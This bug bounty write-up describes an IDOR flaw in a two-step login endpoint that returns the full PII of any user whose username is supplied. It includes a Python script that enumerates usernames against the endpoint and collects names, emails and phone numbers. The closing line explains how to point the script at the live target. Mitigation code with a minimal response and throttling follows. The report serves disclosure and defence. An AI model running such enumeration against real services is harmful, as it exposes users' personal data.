Hello @All. Today we will talk about one of my latest findings on a private program. The vulnerable function is the login function, which allows an attacker to swap in any username and leak the PII of any registered user.
Let's start with the bug's reproduction steps. If you need a quick definition of IDOR first, check this: (image: malicious user 1234)
Steps to reproduce
1. On the vulnerable subdomain there is a two-step login: you are asked to enter your username first, and only if it is valid do you proceed to the next step and enter your password.
2. After entering a random username, test:
I was surprised that a user called test actually existed and that I obtained all of his PII in the response. The endpoint looks like https://subdomain.target.com/v1.0.0/dev/userfirm/<username>
3. Send this request to Burp Intruder and try it with any leaked usernames, so the enumeration is more realistic.
In this way we can obtain most of the system users' info, such as:
- Username
- First/Last name
- Email address
- Phone number
- Telephone
- Firm Name
- User ID
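The enumeration in steps 1 to 3 as a small script, added here as an example and not part of the original report: it replays the username-check request for each candidate (what Intruder does) and keeps every account whose response carries PII. The base URL follows the endpoint shape above; the JSON key names (firstName, firmName, userId, ...) and the in-memory stand-in for the vulnerable endpoint are constructed assumptions so the example runs offline, and should be replaced with what you actually capture.

```python
import json
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict, List, Tuple

# PII fields the write-up lists. The JSON key names are ASSUMED; adjust them to
# the real response once you have captured it in Burp.
PII_KEYS = ["username", "firstName", "lastName", "email", "phone",
            "telephone", "firmName", "userId"]

# A fetcher maps a candidate username to (HTTP status, response body).
Fetch = Callable[[str], Tuple[int, str]]


def http_fetch(base_url: str) -> Fetch:
    """Build a fetcher that GETs <base_url>/<username> over the network.

    base_url would be https://subdomain.target.com/v1.0.0/dev/userfirm for the
    endpoint in the write-up. Only run this against a target you are authorised to test.
    """
    def fetch(username: str) -> Tuple[int, str]:
        url = f"{base_url}/{urllib.parse.quote(username, safe='')}"
        req = urllib.request.Request(url, headers={"User-Agent": "userfirm-enum"})
        try:
            with urllib.request.urlopen(req, timeout=10) as resp:
                return resp.getcode(), resp.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as e:
            return e.code, e.read().decode("utf-8", "replace")
    return fetch


def extract_pii(body: str) -> Dict[str, str]:
    """Return the PII fields present in a JSON body, or {} if none / not JSON."""
    try:
        data = json.loads(body)
    except ValueError:
        return {}
    if not isinstance(data, dict):
        return {}
    return {k: str(data[k]) for k in PII_KEYS if data.get(k) not in (None, "")}


def enumerate_users(usernames: List[str], fetch: Fetch) -> Dict[str, Dict[str, str]]:
    """Try every candidate username and collect the accounts whose response leaks PII."""
    leaked: Dict[str, Dict[str, str]] = {}
    for name in usernames:
        status, body = fetch(name)
        pii = extract_pii(body)
        if status == 200 and pii:
            leaked[name] = pii
    return leaked


# Constructed stand-in for the vulnerable endpoint so the example runs offline.
FAKE_DB = {
    "test": {"userId": 1042, "username": "test", "firstName": "Tess", "lastName": "Tester",
             "email": "test@example.com", "phone": "+1-555-0100", "firmName": "Example Firm"},
    "jdoe": {"userId": 1043, "username": "jdoe", "firstName": "Jane", "lastName": "Doe",
             "email": "jdoe@example.com", "telephone": "+1-555-0102", "firmName": "Example Firm"},
}


def fake_fetch(username: str) -> Tuple[int, str]:
    """Behaves like the leaky endpoint: 404 for unknown users, full record for known ones."""
    rec = FAKE_DB.get(username)
    if rec is None:
        return 404, json.dumps({"errors": ["user not found"]})
    return 200, json.dumps(rec)


if __name__ == "__main__":
    wordlist = ["admin", "test", "jdoe", "nobody"]
    for name, pii in enumerate_users(wordlist, fake_fetch).items():
        print(name, "->", pii)
```

Swap `fake_fetch` for `http_fetch("https://subdomain.target.com/v1.0.0/dev/userfirm")` to run it for real; a wordlist of leaked or common usernames is what turns a single "test" hit into the bulk disclosure described above.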
After reporting, the bug was resolved and marked as P1.
Mitigation/Fixing
1. Restrict the response so that it does not include any sensitive data. The developers need this information to pass it on to another function, but they forgot to keep it out of the attacker's view. They can replace the PII with a minimal response such as:
{"userExist":"true", "errors": null}
2. Add a throttling control on this API endpoint to stop brute-force attempts. Note that even a bare userExist flag still tells an attacker which usernames are valid, so rate limiting is what keeps that oracle from being abused at scale.
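Both mitigations side by side with the vulnerable behaviour, as an added example that is not the program's or the author's code: the "before" handler serialises the whole user record, the "after" handler returns only the boolean body suggested above and refuses requests beyond a per-client budget. The user store, field names, and the limit of 5 requests per 60 seconds are constructed assumptions.

```python
import time
from collections import deque
from typing import Deque, Dict, Optional

# Constructed user store; the field names are ASSUMED to match the PII list above.
USERS = {
    "test": {"userId": 1042, "username": "test", "firstName": "Tess", "lastName": "Tester",
             "email": "test@example.com", "phone": "+1-555-0100", "telephone": "+1-555-0101",
             "firmName": "Example Firm"},
}


def userfirm_vulnerable(username: str) -> Dict:
    """'Before': the username check hands the whole record to whoever asks."""
    rec = USERS.get(username)
    if rec is None:
        return {"status": 404, "body": {"errors": ["user not found"]}}
    return {"status": 200, "body": dict(rec)}


class Throttle:
    """Sliding window: at most `limit` requests per `window` seconds for each key."""

    def __init__(self, limit: int, window: float):
        self.limit, self.window = limit, window
        self._hits: Dict[str, Deque[float]] = {}

    def allow(self, key: str, now: Optional[float] = None) -> bool:
        now = time.monotonic() if now is None else now
        q = self._hits.setdefault(key, deque())
        while q and now - q[0] >= self.window:   # drop hits outside the window
            q.popleft()
        if len(q) >= self.limit:
            return False
        q.append(now)
        return True


# ASSUMED budget: 5 username checks per client per minute.
THROTTLE = Throttle(limit=5, window=60.0)


def userfirm_hardened(username: str, client_ip: str, now: Optional[float] = None) -> Dict:
    """'After': rate-limited per client, and the body carries only the existence flag.

    The record is still looked up server-side for the password step, but it is never
    serialised into this response.
    """
    if not THROTTLE.allow(client_ip, now):
        return {"status": 429, "body": {"userExist": None, "errors": ["too many requests"]}}
    exists = username in USERS
    return {"status": 200, "body": {"userExist": exists, "errors": None}}


if __name__ == "__main__":
    print("before:", userfirm_vulnerable("test"))
    print("after: ", userfirm_hardened("test", "203.0.113.7"))
    for _ in range(5):
        userfirm_hardened("test", "203.0.113.7")
    print("6th in a minute:", userfirm_hardened("test", "203.0.113.7")["status"])
```

The `now` parameter exists only so the window can be exercised deterministically; in a real service the throttle key would usually combine client IP with the session or a proof-of-work/CAPTCHA stage, since a single IP limit is easy to spread across proxies.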